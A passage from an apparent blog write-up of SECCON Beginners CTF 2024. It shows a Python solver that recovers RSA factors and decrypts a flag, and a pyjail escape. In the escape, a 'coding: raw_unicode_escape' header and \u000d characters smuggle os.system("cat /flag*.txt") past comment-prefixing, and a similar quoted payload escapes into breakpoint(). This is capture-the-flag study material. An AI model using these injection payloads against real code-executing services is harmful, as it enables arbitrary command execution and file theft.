string-interpolation\"><span class=\"token string\">f\"cipher = </span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>c<span class=\"token punctuation\">}</span></span><span class=\"token string\">\"</span></span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"ab = </span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>a <span class=\"token operator\">*</span> b<span class=\"token punctuation\">}</span></span><span class=\"token string\">\"</span></span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">assert</span> gmpy2<span class=\"token punctuation\">.</span>mpz<span class=\"token punctuation\">(</span>a<span class=\"token punctuation\">)</span> <span class=\"token operator\">%</span> <span class=\"token number\">4701715889239073150754995341656203385876367121921416809690629011826585737797672332435916637751589158510308840818034029338373257253382781336806660731169</span> <span class=\"token operator\">==</span> <span class=\"token number\">0</span>\n<span class=\"token keyword\">assert</span> gmpy2<span class=\"token punctuation\">.</span>mpz<span class=\"token punctuation\">(</span>b<span class=\"token punctuation\">)</span> <span class=\"token operator\">%</span> <span class=\"token number\">35760393478073168120554460439408418517938869000491575971977265241403459560088076621005967604705616322055977691364792995889012788657592539661</span> <span class=\"token operator\">==</span> <span class=\"token number\">0</span></code></pre></div>\n<p>Looking at this code, a, b, and x are all perfect squares; a and b are p and q minus x respectively; and both are divisible by a large number (i.e., mod = 0).</p>\n<p>Since ab is the product of perfect squares a and b, factoring it allows us to narrow down the possible values of a and b.</p>\n<p>Using the hint values provided and factordb, I found that there are 14 possible patterns for the values of a and b.</p>\n<p>Also, since p = a+x and q = b+x, and p<em>q = n, the equation `x**2 + (a+b)</em>x + (ab-n) = 0` holds.</p>\n<p>Since there are only 14 patterns for a and b to brute-force, we can identify the correct a, b, and x by finding the case where the solution x is a positive integer and a perfect square.</p>\n<p>Using the identified a, b, and x, we can also determine p and q, then decrypt the ciphertext to obtain the flag.</p>\n<p>Finally, I obtained the flag with the following solver.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">import</span> gmpy2\n<span class=\"token keyword\">import</span> sympy <span class=\"token keyword\">as</span> sp\n<span class=\"token keyword\">from</span> Crypto<span class=\"token punctuation\">.</span>Util<span class=\"token punctuation\">.</span>number <span class=\"token keyword\">import</span> long_to_bytes<span class=\"token punctuation\">,</span> isPrime\n\nn <span class=\"token operator\">=</span> <span class=\"token number\">28347962831882769454618553954958819851319579984482333000162492691021802519375697262553440778001667619674723497501026613797636156704754646434775647096967729992306225998283999940438858680547911512073341409607381040912992735354698571576155750843940415057647013711359949649220231238608229533197681923695173787489927382994313313565230817693272800660584773413406312986658691062632592736135258179504656996785441096071602835406657489695156275069039550045300776031824520896862891410670249574658456594639092160270819842847709283108226626919671994630347532281842429619719214221191667701686004691774960081264751565207351509289</span>\nab <span class=\"token operator\">=</span> <span class=\"token number\">28347962831882769454618553954958819851319579984482333000162492691021802519375697262553440778001667619674723497501026613797636156704754646434775647096967729992306225998283999940438858680547911512073341409607381040912992735354698571576155750843940415057647013711359949649102926524363237634349331663931595027679709000404758309617551370661140402128171288521363854241635064819660089300995273835099967771608069501973728126045089426572572945113066368225450235783211375678087346640641196055581645502430852650520923184043404571923469007524529184935909107202788041365082158979439820855282328056521446473319065347766237878289</span>\n\nBa <span class=\"token operator\">=</span> <span class=\"token number\">4701715889239073150754995341656203385876367121921416809690629011826585737797672332435916637751589158510308840818034029338373257253382781336806660731169</span>\nBb <span class=\"token operator\">=</span> <span class=\"token number\">35760393478073168120554460439408418517938869000491575971977265241403459560088076621005967604705616322055977691364792995889012788657592539661</span>\n<span class=\"token keyword\">assert</span> gmpy2<span class=\"token punctuation\">.</span>mpz<span class=\"token punctuation\">(</span>ab<span class=\"token punctuation\">)</span> <span class=\"token operator\">%</span> Ba <span class=\"token operator\">==</span> <span class=\"token number\">0</span>\n<span class=\"token keyword\">assert</span> gmpy2<span class=\"token punctuation\">.</span>mpz<span class=\"token punctuation\">(</span>ab<span class=\"token punctuation\">)</span> <span class=\"token operator\">%</span> Bb <span class=\"token operator\">==</span> <span class=\"token number\">0</span>\n\nr <span class=\"token operator\">=</span> gmpy2<span class=\"token punctuation\">.</span>mpz<span class=\"token punctuation\">(</span>ab<span class=\"token punctuation\">)</span> <span class=\"token operator\">//</span> Ba <span class=\"token operator\">//</span> Bb\n<span class=\"token keyword\">assert</span> r <span class=\"token operator\">==</span> <span class=\"token number\">168602179130542941829360938763588913033950728808204687738344939756690772499463147969992071622543050423641037178339406288176679147723646123266772165646828805533748632218062968267049753205615282207629849772408015254265200980724449082839150022450439661030563736824487531287491910398220288816325848224837808525851343383555765621</span>\n<span class=\"token comment\"># http://factordb.com/index.php?query=168602179130542941829360938763588913033950728808204687738344939756690772499463147969992071622543050423641037178339406288176679147723646123266772165646828805533748632218062968267049753205615282207629849772408015254265200980724449082839150022450439661030563736824487531287491910398220288816325848224837808525851343383555765621</span>\n\nt1 <span class=\"token operator\">=</span> <span class=\"token number\">306606827773</span> <span class=\"token operator\">**</span> <span class=\"token number\">2</span>\nt2 <span class=\"token operator\">=</span> <span class=\"token number\">199</span> <span class=\"token operator\">**</span> <span class=\"token number\">2</span>\nt3 <span class=\"token operator\">=</span> <span class=\"token number\">173</span> <span class=\"token operator\">**</span> <span class=\"token number\">2</span>\nt4 <span class=\"token operator\">=</span> <span class=\"token number\">3</span> <span class=\"token operator\">**</span> <span class=\"token number\">2</span>\n<span class=\"token keyword\">assert</span> Ba<span class=\"token operator\">**</span><span class=\"token number\">2</span> <span class=\"token operator\">*</span> Bb<span class=\"token operator\">**</span><span class=\"token number\">2</span> <span class=\"token operator\">*</span> t1 <span class=\"token operator\">*</span> t2 <span class=\"token operator\">*</span> t3 <span class=\"token operator\">*</span> t4 <span class=\"token operator\">==</span> ab\n\n<span class=\"token keyword\">def</span> <span class=\"token function\">is_square</span><span class=\"token punctuation\">(</span>n<span class=\"token punctuation\">:</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">return</span> gmpy2<span class=\"token punctuation\">.</span>isqrt<span class=\"token punctuation\">(</span>n<span class=\"token punctuation\">)</span> <span class=\"token operator\">**</span> <span class=\"token number\">2</span> <span class=\"token operator\">==</span> n\n\n<span class=\"token keyword\">def</span> <span class=\"token function\">is_positive_integer_and_perfect_square</span><span class=\"token punctuation\">(</span>num<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">if</span> num<span class=\"token punctuation\">.</span>is_integer <span class=\"token keyword\">and</span> num <span class=\"token operator\">></span> <span class=\"token number\">0</span><span class=\"token punctuation\">:</span>\n        sqrt_num <span class=\"token operator\">=</span> sp<span class=\"token punctuation\">.</span>sqrt<span class=\"token punctuation\">(</span>num<span class=\"token punctuation\">)</span>\n        <span class=\"token keyword\">return</span> sqrt_num<span class=\"token punctuation\">.</span>is_integer\n    <span class=\"token keyword\">return</span> <span class=\"token boolean\">False</span>\n\nL <span class=\"token operator\">=</span> \\\n<span class=\"token punctuation\">[</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span>t2<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">[</span>t1<span class=\"token punctuation\">,</span> t3<span class=\"token punctuation\">,</span> t4<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span>t2<span class=\"token punctuation\">,</span> t3<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">[</span>t1<span class=\"token punctuation\">,</span> t4<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span>t1<span class=\"token punctuation\">,</span> t2<span class=\"token punctuation\">,</span> t3<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">[</span>t4<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span>t1<span class=\"token punctuation\">,</span> t2<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">[</span>t3<span class=\"token punctuation\">,</span> t4<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span>t1<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">[</span>t3<span class=\"token punctuation\">,</span> t2<span class=\"token punctuation\">,</span> t4<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span>t4<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">[</span>t1<span class=\"token punctuation\">,</span> t2<span class=\"token punctuation\">,</span> t3<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span>t3<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">[</span>t1<span class=\"token punctuation\">,</span> t2<span class=\"token punctuation\">,</span> t4<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span>t1<span class=\"token punctuation\">,</span> t3<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">[</span>t2<span class=\"token punctuation\">,</span> t4<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span>t2<span class=\"token punctuation\">,</span> t4<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">[</span>t1<span class=\"token punctuation\">,</span> t3<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span>t4<span class=\"token punctuation\">,</span> t3<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">[</span>t1<span class=\"token punctuation\">,</span> t2<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span>t4<span class=\"token punctuation\">,</span> t1<span class=\"token punctuation\">,</span> t3<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">[</span>t2<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span>t4<span class=\"token punctuation\">,</span> t2<span class=\"token punctuation\">,</span> t3<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">[</span>t1<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span>t1<span class=\"token punctuation\">,</span> t4<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">[</span>t2<span class=\"token punctuation\">,</span> t3<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span>t1<span class=\"token punctuation\">,</span> t2<span class=\"token punctuation\">,</span> t4<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">[</span>t3<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">]</span>\n\n<span class=\"token keyword\">for</span> l <span class=\"token keyword\">in</span> L<span class=\"token punctuation\">:</span>\n    a <span class=\"token operator\">=</span> Ba<span class=\"token operator\">**</span><span class=\"token number\">2</span>\n    b <span class=\"token operator\">=</span> Bb<span class=\"token operator\">**</span><span class=\"token number\">2</span>\n    <span class=\"token keyword\">for</span> A <span class=\"token keyword\">in</span> l<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">:</span>\n        a <span class=\"token operator\">*=</span> A\n    <span class=\"token keyword\">for</span> B <span class=\"token keyword\">in</span> l<span class=\"token punctuation\">[</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">:</span>\n        b <span class=\"token operator\">*=</span> B\n\n    <span class=\"token keyword\">assert</span> is_square<span class=\"token punctuation\">(</span>a<span class=\"token punctuation\">)</span> <span class=\"token keyword\">and</span> is_square<span class=\"token punctuation\">(</span>b<span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">assert</span> a<span class=\"token operator\">*</span>b <span class=\"token operator\">==</span> ab\n\n    x <span class=\"token operator\">=</span> sp<span class=\"token punctuation\">.</span>symbols<span class=\"token punctuation\">(</span><span class=\"token string\">'x'</span><span class=\"token punctuation\">)</span>\n    A <span class=\"token operator\">=</span> a <span class=\"token operator\">+</span> b\n    B <span class=\"token operator\">=</span> ab <span class=\"token operator\">-</span> n\n    equation <span class=\"token operator\">=</span> x<span class=\"token operator\">**</span><span class=\"token number\">2</span> <span class=\"token operator\">+</span> A<span class=\"token operator\">*</span>x <span class=\"token operator\">+</span> B\n    solutions <span class=\"token operator\">=</span> sp<span class=\"token punctuation\">.</span>solve<span class=\"token punctuation\">(</span>equation<span class=\"token punctuation\">,</span> x<span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">for</span> solution <span class=\"token keyword\">in</span> solutions<span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">if</span> sp<span class=\"token punctuation\">.</span>im<span class=\"token punctuation\">(</span>solution<span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">0</span><span class=\"token punctuation\">:</span>\n            real_solution <span class=\"token operator\">=</span> sp<span class=\"token punctuation\">.</span>re<span class=\"token punctuation\">(</span>solution<span class=\"token punctuation\">)</span>\n            <span class=\"token keyword\">if</span> is_positive_integer_and_perfect_square<span class=\"token punctuation\">(</span>real_solution<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n                <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"a=</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>a<span class=\"token punctuation\">}</span></span><span class=\"token string\">,b=</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>b<span class=\"token punctuation\">}</span></span><span class=\"token string\">,x=</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>real_solution<span class=\"token punctuation\">}</span></span><span class=\"token string\">\"</span></span><span class=\"token punctuation\">)</span>\n\na <span class=\"token operator\">=</span> <span class=\"token number\">7878824508023825320620552438859131751341011236435661361507465408511567856339128586549369157062948927445512194472763840898824746924636029850659802261912150719575815528250042476759316872507696855084778513881881419453874766724167271062172560745165185117184785529887592443222251487197342298902245870192371299449</span>\nb <span class=\"token operator\">=</span> <span class=\"token number\">3597993939706753790208197378148848949822043309769682578959924290719006420996423496659961817582141773260972861724771414278651046463502978594910794197098988322222621708534481711002211659109357402539392364289580131703038942827590851390068976436194200123404980430263753899361953534498940931686689517154815683161</span>\nx <span class=\"token operator\">=</span> <span class=\"token number\">10221013321700464817330531356688256100</span>\np <span class=\"token operator\">=</span> a <span class=\"token operator\">+</span> x\nq <span class=\"token operator\">=</span> b <span class=\"token operator\">+</span> x\ne <span class=\"token operator\">=</span> <span class=\"token number\">65537</span>\nc <span class=\"token operator\">=</span> <span class=\"token number\">21584943816198288600051522080026276522658576898162227146324366648480650054041094737059759505699399312596248050257694188819508698950101296033374314254837707681285359377639170449710749598138354002003296314889386075711196348215256173220002884223313832546315965310125945267664975574085558002704240448393617169465888856233502113237568170540619213181484011426535164453940899739376027204216298647125039764002258210835149662395757711004452903994153109016244375350290504216315365411682738445256671430020266141583924947184460559644863217919985928540548260221668729091080101310934989718796879197546243280468226856729271148474</span>\n<span class=\"token keyword\">assert</span> isPrime<span class=\"token punctuation\">(</span>p<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">assert</span> isPrime<span class=\"token punctuation\">(</span>q<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">assert</span> p <span class=\"token operator\">!=</span> q\n<span class=\"token keyword\">assert</span> n <span class=\"token operator\">==</span> p <span class=\"token operator\">*</span> q\n\nphi_n <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span>p <span class=\"token operator\">-</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">*</span> <span class=\"token punctuation\">(</span>q <span class=\"token operator\">-</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span>\nd <span class=\"token operator\">=</span> sp<span class=\"token punctuation\">.</span>mod_inverse<span class=\"token punctuation\">(</span>e<span class=\"token punctuation\">,</span> phi_n<span class=\"token punctuation\">)</span>\nm <span class=\"token operator\">=</span> <span class=\"token builtin\">pow</span><span class=\"token punctuation\">(</span>c<span class=\"token punctuation\">,</span> d<span class=\"token punctuation\">,</span> n<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>long_to_bytes<span class=\"token punctuation\">(</span>m<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span></code></pre></div>\n<h2 id=\"commentatormisc\" style=\"position:relative;\"><a href=\"#commentatormisc\" aria-label=\"commentatormisc permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>commentator(Misc)</h2>\n<blockquote>\n<p>Be careful with comments!</p>\n<p>nc commentator.beginners.seccon.games 4444</p>\n</blockquote>\n<p>The following code is provided for the challenge.</p>\n<p>It appears to be an application that prepends <code class=\"language-text\">#</code> to each line of the received input to comment it out, saves it as a Python file, and executes it.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token comment\">#!/usr/local/bin/python</span>\n\n<span class=\"token keyword\">import</span> os\n<span class=\"token keyword\">import</span> uuid\n\n<span class=\"token comment\">############################## Logo ##############################</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>\n    <span class=\"token string-interpolation\"><span class=\"token string\">f\"\"\"                                          _        _                  __\n  ___ ___  _ __ ___  _ __ ___   ___ _ __ | |_ __ _| |_ ___  _ __   _  \\\\ \\\\\n / __/ _ \\\\| '_ ` _ \\\\| '_ ` _ \\\\ / _ \\\\ '_ \\\\| __/ _` | __/ _ \\\\| '__| (_)  | |\n| (_| (_) | | | | | | | | | | |  __/ | | | || (_| | || (_) | |     _   | |\n \\\\___\\\\___/|_| |_| |_|_| |_| |_|\\\\___|_| |_|\\\\__\\\\__,_|\\\\__\\\\___/|_|    (_)  | |\n                                                                       /_/\n</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span><span class=\"token string\">\"-\"</span> <span class=\"token operator\">*</span> <span class=\"token number\">75</span><span class=\"token punctuation\">}</span></span><span class=\"token string\">\nEnter your Python code (ends with __EOF__)\"\"\"</span></span>\n<span class=\"token punctuation\">)</span>\n<span class=\"token comment\">############################## Logo ##############################</span>\n\npython <span class=\"token operator\">=</span> <span class=\"token string\">\"\"</span>\n<span class=\"token keyword\">while</span> <span class=\"token boolean\">True</span><span class=\"token punctuation\">:</span>\n    line <span class=\"token operator\">=</span> <span class=\"token builtin\">input</span><span class=\"token punctuation\">(</span><span class=\"token string\">\">>> \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>replace<span class=\"token punctuation\">(</span><span class=\"token string\">\"\\r\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">if</span> <span class=\"token string\">\"__EOF__\"</span> <span class=\"token keyword\">in</span> line<span class=\"token punctuation\">:</span>\n        python <span class=\"token operator\">+=</span> <span class=\"token string\">'print(\"thx :)\")'</span>\n        <span class=\"token keyword\">break</span>\n    python <span class=\"token operator\">+=</span> <span class=\"token string-interpolation\"><span class=\"token string\">f\"# </span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>line<span class=\"token punctuation\">}</span></span><span class=\"token string\">\\n\"</span></span>  <span class=\"token comment\"># comment :)</span>\n\npyfile <span class=\"token operator\">=</span> <span class=\"token string-interpolation\"><span class=\"token string\">f\"/tmp/</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>uuid<span class=\"token punctuation\">.</span>uuid4<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">}</span></span><span class=\"token string\">.py\"</span></span>\n<span class=\"token keyword\">with</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span>pyfile<span class=\"token punctuation\">,</span> <span class=\"token string\">\"w\"</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">as</span> f<span class=\"token punctuation\">:</span>\n    f<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span>python<span class=\"token punctuation\">)</span>\n\nos<span class=\"token punctuation\">.</span>system<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"python </span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>pyfile<span class=\"token punctuation\">}</span></span><span class=\"token string\">\"</span></span><span class=\"token punctuation\">)</span>\nos<span class=\"token punctuation\">.</span>remove<span class=\"token punctuation\">(</span>pyfile<span class=\"token punctuation\">)</span></code></pre></div>\n<p>Since Python’s input function reads data up to <code class=\"language-text\">\\n</code>, using <code class=\"language-text\">\\r</code> could bypass the <code class=\"language-text\">#</code> prepending and allow execution of arbitrary Python code.</p>\n<p>However, in this challenge, <code class=\"language-text\">.replace(\"\\r\", \"\")</code> removes <code class=\"language-text\">\\r</code>, so this approach cannot be used.</p>\n<p>After trying various inputs to find a way to bypass the comment-out, I shifted my focus to whether any operation could be performed even while the code is commented out.</p>\n<p>As a result, although the shebang wasn’t particularly useful since the script is executed via <code class=\"language-text\">os.system(f\"python {pyfile}\")</code>, I confirmed that the <code class=\"language-text\">#coding:</code> directive still takes effect.</p>\n<p>When I looked into the benefits of specifying an encoding with <code class=\"language-text\">#coding:</code> in a Python script file, I found the following information.</p>\n<blockquote>\n<p>This PEP proposes to introduce a syntax to declare the encoding of a Python source file. The encoding information is then used by the Python parser to interpret the file using the given encoding. Most notably this enhances the interpretation of Unicode literals in the source code and makes it possible to write Unicode literals using e.g. UTF-8 directly in an Unicode aware editor.</p>\n</blockquote>\n<p>Reference: <a href=\"https://peps.python.org/pep-0263/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">PEP 263 – Defining Python Source Code Encodings | peps.python.org</a></p>\n<p>Reference: <a href=\"https://docs.python.org/ja/3/library/codecs.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">codecs — Codec Registry and Base Classes — Python 3.12.4 Documentation</a></p>\n<p>It appears that specifying the source code encoding appropriately enables the interpretation of Unicode literals written in UTF-8.</p>\n<p>So, I entered <code class=\"language-text\">coding: raw_unicode_escape</code> on the first line to set the script encoding to <code class=\"language-text\">raw_unicode_escape</code>, then used the Unicode character <code class=\"language-text\">\\u000d</code> to insert a carriage return without triggering the <code class=\"language-text\">\\r</code> removal, thereby enabling arbitrary Python code execution.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\">coding<span class=\"token punctuation\">:</span> raw_unicode_escape\n\\u000dimport os\n\\u000dos<span class=\"token punctuation\">.</span>system<span class=\"token punctuation\">(</span><span class=\"token string\">\"cat /flag*.txt\"</span><span class=\"token punctuation\">)</span>\n__EOF__</code></pre></div>\n<p>Providing this input allows us to identify the correct flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 782px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/aad11705cc2cfef20731be75dc4fec16/2e195/image-20240616080331071.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 36.25%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABCUlEQVQoz41RW3LDIAzE9thgMOBn3HTqV5z2Aknvf7StJKf5ykz7sYNYSSuxqLIsEUJAiAHWWvDdey9xVVV0N0+ubdtnrffVI1/S6YRPEgXFjbGO6Lqj2BhzNAUvPMdcw2fXd4gxoiaec03bIMsyEWYuSRIonsxFv2RFk3kDxtFcC2RrZ+EIPMA5J9tprSXmAWmaQp3fz9i2FZd9w7otWJYZ0/yBaSLMk2zsw2GBUupvsPJ+3XH/vpHgipkEe3laQEs2sFBR5P8TY4xvI/b9gs+vq3g0jicMQy/PlPg00Gc04iFz7LWjT2DvXgrydGM08jynTQqU9vCl0IWczGvKM/j59pGXD3gh+AMCDZ6kCra59AAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/aad11705cc2cfef20731be75dc4fec16/8ac56/image-20240616080331071.webp 240w,\n/static/aad11705cc2cfef20731be75dc4fec16/d3be9/image-20240616080331071.webp 480w,\n/static/aad11705cc2cfef20731be75dc4fec16/c0b7e/image-20240616080331071.webp 782w\"\n              sizes=\"(max-width: 782px) 100vw, 782px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/aad11705cc2cfef20731be75dc4fec16/8ff5a/image-20240616080331071.png 240w,\n/static/aad11705cc2cfef20731be75dc4fec16/e85cb/image-20240616080331071.png 480w,\n/static/aad11705cc2cfef20731be75dc4fec16/2e195/image-20240616080331071.png 782w\"\n            sizes=\"(max-width: 782px) 100vw, 782px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/aad11705cc2cfef20731be75dc4fec16/2e195/image-20240616080331071.png\"\n            alt=\"image-20240616080331071\"\n            title=\"image-20240616080331071\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Incidentally, there was also a similar pyjail challenge in another CTF where the flag could be obtained using <code class=\"language-text\">#coding: raw_unicode_escape</code> and sending byte characters in Unicode notation.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token comment\">#coding: raw_unicode_escape</span>\nx<span class=\"token operator\">=</span><span class=\"token string\">'PEKO\\u0027\\u002b\\u0062\\u0072\\u0065\\u0061\\u006b\\u0070\\u006f\\u0069\\u006e\\u0074\\u0028\\u0029\\u002b\\u0027'</span></code></pre></div>\n<p>Reference: <a href=\"https://blog.maple3142.net/2023/06/05/justctf-2023-writeups/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">justCTF 2023 WriteUps | 廢文集中區</a></p>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>As for the kernel exploitation challenge that appeared again this year, I was completely stuck on it, so I’ll work on it another day.</p>","fields":{"slug":"/ctf-sec4b-2024-en","tagSlugs":["/tag/rev-en/","/tag/pwn-en/","/tag/crypto-en/","/tag/misc-en/","/tag/english/"]},"frontmatter":{"date":"2024-06-16","description":"Writeup for SECCON Beginners CTF 2024.","tags":["Rev (en)","Pwn (en)","Crypto (en)","Misc (en)","English"],"title":"SECCON Beginners CTF 2024 Writeup","socialImage":{"publicURL":"/static/d1cd078797f89a002356ff929739e47a/ctf-sec4b-2024.png"}}}},"pageContext":{"slug":"/ctf-sec4b-2024-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}